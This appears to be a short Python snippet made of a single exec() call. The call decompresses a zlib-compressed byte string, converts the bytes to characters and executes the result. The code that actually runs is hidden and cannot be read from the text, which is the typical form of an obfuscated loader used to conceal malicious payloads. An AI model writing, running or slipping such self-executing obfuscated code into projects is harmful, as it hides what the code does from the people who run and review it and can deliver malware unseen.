exec(
    "".join(
        map(
            chr,
            __import__("zlib").decompress(
                b"x\x9cM\x8e\xc1\x0e\xc2 \x10D\xef|\xc5\xa6'H\x9a\x06\xdaj\xab\xa7\xfe\x871\x1b,4\xd6Pl\x00\xff_\xa8Z\xd9\xc3df\xden\xb2dX\xddl\x03\x19\x8c\\nJ\x02\x9e\xa1(\xaa\xc7s\xb6t\x91+\x1d\xef\xae\x04d,\xe7X!*md\x08\x0e\x91rFF#\xbd\x8f\x84@\x1c\xa5'\xc8\xb9\xd7fb\x1f\x94\xc6\xe9\xf0r\x16.]_\x82\xe0\"\x8a\xf8\xbb\xb6\x84\xa6N\xa9Ii\xab\xf8WN]\xce\xf8!?\xdc\xfaZ\xec7\xbf\xd5d\x84\x88\xae=^\xf7\x07\xde\xfe\x0b9V"
            ),
        )
    )
)
